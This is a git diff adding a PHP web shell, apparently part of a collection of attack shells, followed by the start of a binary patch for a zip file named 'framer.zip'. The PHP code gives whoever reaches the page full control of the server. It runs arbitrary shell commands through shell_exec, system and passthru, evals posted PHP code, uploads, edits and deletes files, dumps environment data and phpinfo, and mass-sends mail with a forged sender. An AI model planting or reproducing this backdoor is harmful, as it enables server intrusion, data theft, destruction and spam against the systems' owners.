+font-family: trebuchet Ms; 
+border-right-width: 1px; 
+border-right-color: #8B8989;
+}
+input {
+border-top-width: 1px; 
+font-weight: bold; 
+border-left-width: 1px; 
+font-size: 10px; 
+border-left-color: #8B8989; 
+background: #8B8989; 
+border-bottom-width: 1px; 
+border-bottom-color: #8B8989; 
+color: black; 
+border-top-color:#8B8989; 
+font-family: trebuchet Ms; 
+border-right-width: 1px; 
+border-right-color:#8B8989;
+}
+td {
+    font-size: 10px; 
+    font-family: verdana;
+}
+th {
+    font-size: 10px; 
+    font-family: verdana;
+}
+a:link {
+    text-decoration: none;
+}
+a:visited {
+    text-decoration: none;
+        color:blue;
+}
+a:active {
+    text-decoration: none;
+}
+a:hover {
+    color: #00ff00; 
+    text-decoration: none;
+}
+back {
+background-color:grey;
+}
+ ul#Navigation {
+position:absolute;
+    width: 10em;
+    margin: 0; padding: 0.8em;
+    border: 1px solid #8B8989;
+    background-color: #8B8989;
+  }
+  * html ul#Navigation {  /* Korrekturen fuer IE 5.x */
+    width: 11.6em;
+    w\idth: 10em;
+    padding-left: 0;
+    padd\ing-left: 0.8em;
+  }
+  ul#Navigation li {
+    list-style: none;
+    margin: 0.4em; padding: 0;
+  }
+
+  ul#Navigation a {
+    display:block;
+    padding: 0.2em;
+    text-decoration: none; font-weight: bold;
+    border: 1px solid black;
+    border-left-color: black; border-top-color: black;
+    color: black; background-color: #8B8989;
+  }
+  * html ul#Navigation a {  /* Breitenangaben nur fuer IE */
+    width: 100%;
+    w\idth: 8.8em;
+  }
+  ul#Navigation a:hover {
+    border-color: white;
+    border-left-color: black; border-top-color: black;
+    color: white; background-color: #8B8989;
+  }
+</style>
+
+<?php
+if (!function_exists(rename_all)) {
+    function rename_all($dir,$prefix,$name,$del) {
+     $r_dir=opendir($dir);
+       while (false !== ($file_r = readdir($r_dir))) {
+         if (@filetype($dir."/".$file_r)=="file") {
+           $i++;
+        @copy($dir."/".$file_r,$dir."/".$i.".".$prefix.$name) or die ("[-]Error renaming file : ".$file_r."");
+         if ($del=="yes") {
+          @unlink($dir."/".$file_r) or die ("[-]Error deleting file(s)!");
+        }
+       }
+       
+      }
+       echo "Successfully renamed file(s)!";
+    }
+  }
+        
+        
+
+if (!function_exists(get_perms)) {
+     function get_perms($file) {
+    if (@file_exists($file)) {
+      if (@is_readable($file)) {
+        echo "<b>R</b>";
+         }
+           if (@is_executable($file)) {
+            echo "<b>E</b>";
+             }
+               if (@is_writable($file)) {
+                echo "<b>W</b>";
+                }
+              } else {
+                 echo "[-]Error";
+               }
+            }
+          }
+
+if (!function_exists(search_file)) {
+   function search_file($search,$dir) {
+    global $word;
+     global $surl;
+    $d_s=opendir($dir);
+    while (false !== ($file_s = readdir($d_s))) {
+      if (preg_match("/".$search."/i",$file_s))   {
+         echo "<a href=".$surl."?&".$word."&file_browser&file=".urlencode($dir)."/".urlencode($file_s).">".$file_s."</a><br>";
+         }
+       }
+     }
+   }
+
+
+if (!function_exists(copy_file)) {
+    function copy_file($file,$to) {
+   if (@file_exists($file)) {
+     @copy($file,$to) or die ("[-]Error copying file!");
+      echo "Successfully copied file!";
+       } else {
+           echo "[-]File Doesnt exist!";
+       }
+    }
+ }
+
+if (!function_exists(send_mail)) {
+   function send_mail($from,$to,$text,$subject,$times) {
+              while ($i<$times) {
+               $i++;
+               $header  = "From: $from\r\n";    
+                @mail($to, $subject, $text, $header) or die ("[-]Error sending mail(s)!");
+
+              }
+                   echo "Successfully sent mail(s) to ".$to."!";
+   }
+ }
+
+
+if (!function_exists(read_file)) {
+   function read_file($file) {
+$file=@fopen($file,"r");
+echo fread($file,10000);
+fclose($file);
+       }
+     }
+
+if (!function_exists(write_file)) {
+   function write_file($file,$text) {
+     if (@is_writable($file)) {
+      if (@file_exists($file)) {
+        $file_w=@fopen(urldecode($file),"w") or die ("[-]Error");
+         if (fwrite($file_w,$text)) {
+            echo "Successfully written to file(s)!";
+          }
+        }
+     }
+           else {
+           echo "[-]Error";
+            exit;
+     }
+   }
+ }
+      
+
+
+if (!function_exists(count_all)) {
+     function count_all($dir) {
+       $c_d=opendir($dir);
+        while (false !== ($file_c = readdir($c_d))) {
+         if (@filetype($dir."/".$file_c)=="file") {
+            $file_c_s++;
+         } 
+           else 
+         { 
+            $dir_c++;
+         }
+        }
+       echo "Directories:";
+        echo $dir_c++;
+         echo "||";
+          echo "Files:";
+            echo $file_c_s;
+     }
+}
+
+if (!function_exists(check_access)) {
+   function check_access($file) {
+     if (@is_readable($file)) {
+       echo "R";
+        }
+         if (@is_executable($file)) {
+           echo "E";
+             } 
+              if (@is_writable($file)) {
+                echo "W"; 
+                 }
+              } 
+           }
+
+if (!function_exists(clear_dir)) {
+   function clear_dir($dir) {
+$o_d=opendir($dir);
+   while (false !== ($file = readdir($o_d))) {
+    if (@filetype(urldecode($_GET['file'])."/".$file)=="file") {
+unlink(urldecode($dir)."/".$file) or die ("[-]Error @ file:".$file."");
+   }
+ }
+echo "Successfully cleared directory!";
+   }
+ }
+
+?>
+
+
+<?php
+// real code start !
+
+
+if (isset($_GET['update'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+check_update();
+exit;
+}
+if (isset($_GET['rmdir']))  {
+echo "<center><table border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+@rmdir($_GET['file']) or die ("[-]Error deleting dir!");
+echo "Successfully deleted dir(s)!";
+exit;
+}
+
+
+if (isset($_GET['upload'])) {
+$uploaddir = urldecode($_POST['file']);
+
+print "<pre>";
+if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir ."/". $_FILES['userfile']['name'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+   print "Successfully uploadet file(s)!";
+} else {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+   print "[-]Error";
+}
+exit;
+}
+
+if (isset($_GET['search'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+
+    <tr><td>";
+search_file($_POST['search'],urldecode($_POST['dir']));
+exit;
+}
+
+
+
+
+if (isset($_GET['getenv'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+echo getenv($_GET['getenv']);
+exit;
+}
+
+
+if (isset($_GET['php_info'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+phpinfo();
+exit;
+}
+
+if (isset($_GET['defined_vars'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+echo "<center><textarea rows=40 cols=120>";
+$vars=get_defined_vars();
+print_r($vars);
+echo "</textarea>";
+
+exit;
+}
+
+if (isset($_GET['env'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead><br>
+    <tr><td>";
+$ary=get_defined_vars();
+$it=array_keys($ary);
+foreach ($it as $i) {
+echo "<a href=".$surl."?&".$word."&getenv=".$i.">".$i."</a><br>";
+
+}
+exit;
+}
+
+if (isset($_GET['play'])) {
+echo "<embed src=".urlencode($filename)." autostart=true loop=true hidden=true height=0 width=0>";
+exit;
+}
+
+
+if (isset($_GET['special_crypt'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+echo "<textarea rows=15 cols=90>";
+if (isset($_POST['submit'])) {
+$file=@fopen($_FILES['userfile']['tmp_name'],"r") or die ("[-]Error reading file!");
+$meth=$_POST['crypt'];
+if ($meth=="1") {
+echo htmlspecialchars(md5(fread($file,10000)));
+ } elseif ($meth=="2") {
+      echo htmlspecialchars(crypt(fread($file,10000)));
+}
+    elseif ($meth=="3") {
+     echo htmlspecialchars(sha1(fread($file,10000)));
+  }
+elseif ($meth=="4") {
+     echo htmlspecialchars(crc32(fread($file,10000)));
+}
+   elseif ($meth=="5") {
+     echo htmlspecialchars(urlencode(fread($file,10000)));
+}
+
+   elseif ($meth=="6") {
+     echo htmlspecialchars(urldecode(fread($file,10000)));
+}
+   elseif ($meth=="7") {
+     echo htmlspecialchars(base64_encode(fread($file,10000)));
+}
+
+elseif ($meth=="8") {
+     echo htmlspecialchars(base64_decode(fread($file,10000)));
+}
+
+}
+echo "</textarea><div align=left>";
+
+?>
+<form enctype="multipart/form-data" action=<?php echo $surl ?>&<?php echo $word ?>&special_crypt method="post">
+file: <input name="userfile" type="file"><br><br>
+
+<input type="submit" value="Start" name="submit"><br>
+<input type=radio name=crypt value=1>md5();<br>
+<input type=radio name=crypt value=2>crypt();<br>
+<input type=radio name=crypt value=3>sha1();<br>
+<input type=radio name=crypt value=4>crc32();<br>
+<input type=radio name=crypt value=5>urlencode();<br>
+<input type=radio name=crypt value=6>urldecode();<br>
+<input type=radio name=crypt value=7>base64_encode();<br>
+<input type=radio name=crypt value=5>base64_decode();<br>
+
+<?php
+exit;
+}
+if (isset($_GET['crypt'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&crypt method="post">
+Crypt:<br>
+<textarea rows=12 cols=120 name=crypt>
+</textarea>
+<?php
+$text=$_POST['crypt'];
+?>
+md5:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(md5($text)) ?>><br><br>
+
+crypt:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(crypt($text)) ?>><br><br>
+
+sha1:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(sha1($text)) ?>><br><br>
+
+crc32:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(crc32($text)) ?>><br><br>
+
+urlencode:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo  htmlspecialchars(urlencode($text)) ?>><br><br>
+
+urldecode:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(urldecode($text)) ?>><br><br>
+
+base64_encode:&ensp;<input type=text size=40 value=<?php echo base64_encode($text) ?>><br><br>
+
+base64_decode:&ensp;<input type=text size=40 value=<?php echo base64_decode($text) ?>><br><br>
+<?php
+echo "<input type=submit value=Start></form><form action=".$surl."?&".$word."&special_crypt method=post><input type=submit value=file_inload_crypt>";
+exit;
+}
+
+if (isset($_GET['php_code'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&php_code method="post">
+
+<textarea rows=12 cols=120 name=code>
+</textarea>
+<textarea rows=12 cols=120 readonly>
+<?php
+eval($_POST['code']);
+echo "</textarea>";
+echo "<br><br><input type=submit value=Start>";
+exit;
+}
+
+if (isset($_GET['search_st'])) {
+   if (isset($_POST['search'])) {
+search_file($_POST['search'],$_POST['dir']);
+ }
+exit;
+}
+
+
+if (isset($_GET['rename_all'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+rename_all(urldecode($_POST['d']),$_POST['prefix'],$_POST['name'],$_POST['del']);
+exit;
+}
+
+if (isset($_GET['special_d'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+ $way=$_POST['way'];
+   if ($way=="1") {
+clear_dir($_GET['file']);
+   exit;
+  }
+    if ($way=="2") {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&rename_all method="post">
+Prefix:<br><input type="text" name="prefix"><br>
+Name:<br><input type="text" name="name"><br>
+<input type="hidden" name="d" value=<?php echo urlencode($filename) ?>>
+Delete old files?:<input type="radio" name="del" value="yes"><br>
+<br><input type="submit" value="Rename">
+<?php
+exit;
+}
+}
+
+
+if (isset($_GET['special_dir'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+?>
+
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&special_d&file=<?php echo urlencode($filename) ?> method=post>
+<input type="radio" name="way" value="1">Clear Dir<input type=hidden name=dir value=<?php echo urlencode($filename) ?>><br><br>
+<input type="radio" name="way" value="2">Rename with prefix<br><br>
+<input type="submit" name="sub" value="Start">
+<?php
+exit;
+}
+
+if (isset($_GET['delete'])) {
+   if (@file_exists($filename)) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+    @unlink($filename) or die ("[-]Error deleting file!");
+     echo "Successfully Deleted File!";
+      exit;
+   }
+}
+
+if (isset($_GET['save'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+     write_file(urldecode($_POST['file']),stripslashes($_POST['text']));
+   
+   exit;
+}
+
+if (isset($_GET['exec'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td><center>";
+@chdir(urldecode($_POST['dir']));
+echo "<textarea rows=15 cols=114>";
+echo shell_exec($_POST['command']);
+echo "</textarea>";
+exit;
+}
+
+
+if (isset($_GET['mkdir'])) {
+   if (isset($_POST['name'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+     mkdir(urldecode($_POST['dir'])."/".$_POST['name']) or die ("[-]Error creating dir!");
+     echo "Successfully created dir!";
+   }
+exit;
+}
+
+if (isset($_GET['mkfile'])) {
+   if (isset($_POST['name'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+$dir=urldecode($_POST['dir']);
+$filed=$_POST['name'];
+
+       if (@file_exists($dir."/".$filed)) {
+     echo "[-]Allready exists!";
+      exit;
+     }
+    $file_c=@fopen($dir."/".$filed,"w") or die ("[-]Can't create file!");
+     echo "Scuessfully created file(s)!";
+   }
+exit;
+}
+
+if (isset($_GET['edit'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+   if (@file_exists($filename)) {
+     echo "<form action=".$surl."?&".$word."&save method=post><textarea rows=15 cols=90 name=text>";
+      read_file($filename);
+       echo "</textarea><br><br><input type=hidden name=file value=".urlencode($_GET['file'])."><input type=submit name=sub value=Save>";
+       }
+    exit;
+}
+
+
+
+if (isset($_GET['copy_start'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+copy_file($_POST['from'],$_POST['to']);
+exit;
+}
+
+
+
+if (isset($_GET['copy_file']))  {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&copy_start method="post">
+New:<br><textarea rows=4 cols=70 name="to"><?php echo realpath($filename) ?></textarea><br><br>
+Old:<br><textarea rows=4 cols=70 name="from"><?php echo realpath($filename) ?></textarea><br><br>
+<input type="submit" name="sub" value="Copy">
+<?php
+exit;
+}
+
+if (isset($_GET['send_mail_st'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+
+    <tr><td>";
+if (isset($_POST['from'])) 
+{
+if (isset($_POST['to'])) 
+{
+if (isset($_POST['text'])) 
+{
+if (isset($_POST['subject']))
+{
+if (isset($_POST['times']))
+{
+send_mail($_POST['from'],$_POST['to'],$_POST['text'],$_POST['subject'],$_POST['times'])  ; 
+exit;
+}
+}
+}
+}
+}
+}
+if (isset($_GET['send_mail'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&send_mail_st method="post">
+From:&ensp;&ensp;&ensp;&ensp;<input type="text" name="from"><br><br>
+To:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="text" name="to"><br><br>
+Subject:&ensp;&ensp;<input type="text" name="subject"><br><br>
+Times:&ensp;&ensp;&ensp;<input type="text" name="times"><br><br>
+
+Text:<br><textarea rows=15 cols=60 name="text"></textarea><br><br>
+<input type="submit" name="sub" value="Send!">
+<?php
+exit;
+}
+if (isset($_GET['file_browser'])) {
+
+   for ($i=0;$i<4;$i++) {
+     if (preg_match("/".$file_tps["img"][$i]."/i",$extn)) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+     echo "<a href=".$surl."?&".$word."&file_browser&file=".urlencode($filename)."&img><img src='".urldecode($surl)."?&".$word."&file=".urldecode($filename)."&img' height= width= border=0><br>";
+  exit;
+}  }
+
+
+
+if (@filetype($j_f)=="file") {
+echo "<center><table border=\"1\" rules=\"groups\" 
+  <thead>
+    <tr><td>";
+highlight_file($j_f);
+
+exit;
+}
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+
+      <th></th><td>";
+count_all($j_d);
+echo "</tr>";
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+      <th>Filename</th><th>Edit</th><th>Copy</th><th>Download</th><th>Delete<th>Perms</th><th>Access</th> ";
+
+
+
+
+$o_d=opendir($j_d);
+
+
+
+   while (false !== ($file = readdir($o_d))) {
+     echo " <tbody>
+
+    <tr>
+      <td>";
+if (@filetype($j_d."/".$file)=="dir") {
+echo "</a><img  src=".$surl."?&".$word."&dir&pic=dir height=12 width=><a href=".$surl."&".$word."&&file_browser&file=".urlencode($j_d)."/".urlencode($file).">[".$file."]";
+} else {
+echo "<img  src=".$surl."?&".$word."&dir&pic=ext_wri height=9 width=><a href=".$surl."&".$word."&&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+echo $file;
+}
+echo "<br></a></td><td><a href=".$surl."&".$word."&edit&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Edit]";
+}
+else {
+echo "</a><center>[-]";
+}
+echo "</a></td><td><a href=".$surl."&".$word."&copy_file&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Copy]";
+} else {
+echo "</a><center>[-]";
+}
+echo "</a></td><td><a href=".$surl."&".$word."&download&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Download]";
+} else {
+echo "</a><center>[-]";
+}
+echo "</a></td><td><a href=".$surl."&".$word."&delete&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Delete]";
+} else {
+echo "</a><center><a href=".$surl."&".$word."&rmdir&file_browser&file=".urlencode($j_d)."/".urlencode($file).">[Delete]</a>";
+} 
+echo "<td><center>";
+echo @fileowner($j_f."/".$file);
+echo "</td>";
+echo "<td><center>";
+get_perms(fileperms($j_f."/".$file));
+echo "</td>";
+echo "</a></td>";
+ }
+echo "<center><table width=360 height=40 border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form enctype="multipart/form-data" action=<?php echo $surl ?>&<?php echo $word ?>&upload method="post">
+file: &ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input name="userfile" type="file">
+<input type="hidden" name="file" value=<?php echo urlencode($_GET['file']) ?>>
+<input type="submit" value="Upload"><br><br><?php
+if (@is_writable($j_d)) {
+echo "<font color=green>[Ok]</font>";
+  } else {
+echo "<font color=red>[No]</font>";
+ }
+?>
+</form>
+
+<?php
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&search method="post">
+search: &ensp;&ensp;&ensp;&ensp;<input name="search" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="Search">
+</form>
+<?php
+
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+  <thead>
+
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&mkdir method="post">
+name: &ensp;&ensp;&ensp;&ensp;&ensp;<input name="name" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="mkdir">
+</form>
+<?php
+if (@is_writable($j_d)) {
+echo "<font color=green>[Ok]</font>";
+  } else {
+echo "<font color=red>[No]</font>";
+ }
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&mkfile method="post">
+name:&ensp;&ensp;&ensp;&ensp;&ensp; <input name="name" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="mkfile">
+</form>
+<?php
+if (@is_writable($j_d)) {
+echo "<font color=green>[Ok]</font>";
+  } else {
+echo "<font color=red>[No]</font>";
+ }
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&exec method="post">
+command: <input name="command" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="execute">
+</form>
+<?php
+echo "</td><center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+
+      <th></th><td><a href=".$surl."?&".$word."&special_dir&file=".urlencode($filename).">Special DirOptions</a></td> ";
+echo "</a>";
+exit;
+  }
+?>
+
+
+
+<html>
+  <ul id="Navigation">
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&file_browser&file=<?php echo  "." ?>>File_Browser</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&send_mail>Send Mail(s)</a></li>
+
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&php_code>php_code</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&crypt>crypter</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&php_info>php_info()</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&defined_vars>defined_vars()</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&env>env()</a></li>
+
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&update>update()</a></li>
+  </ul>
+<center><table border="1" rules="groups">
+  <thead>
+    <tr>
+     <th></th>
+       <td>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&exec_st method="post">
+
+<input type="submit" name="sub" value="Execute"><br>
+<br>
+<input type="text" name="command">
+<br>
+<input type="radio" name="method" value="1">shell_exec();
+<input type="radio" name="method" value="2">system();
+<input type="radio" name="method" value="3">passthru();
+<input type="radio" name="method" value="4">automatic();<br>
+<textarea name="exec" rows=15 cols=90>
+<?php
+if (isset($_GET['exec_st'])) {
+    $meth=$_POST['method'];
+      $com=$_POST['command'];
+        if (isset($meth)) {
+          if ($meth=="1") {
+            echo shell_exec($com);
+              }
+               elseif($meth=="2") {
+                 echo system($com); 
+                   }
+                  elseif ($meth=="3") {
+                    passthru($com);
+                     }
+                       elseif ($meth=="4") {
+                         if (function_exists(shell_exec)) {
+                            echo shell_exec($com);
+                              }
+                                 elseif (function_exists(system)) {
+                                   echo system($com);
+                                     }
+                                       elseif (function_exists(passthru)) {
+                                         echo passthru($com);
+                                           }
+                                             else {
+                                              echo "[-]Error";
+                                             }    
+                                          }
+                                       }
+                                    }
+echo "</textarea>";
+exit;
+?> 
\ No newline at end of file
diff --git a/xakep-shells/PHP/framer.zip b/xakep-shells/PHP/framer.zip
new file mode 100644
index 0000000000000000000000000000000000000000..dec3c037b8757d2ad4f5a9eb37b2fdd64785fcc7
GIT binary patch
literal 1494267
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
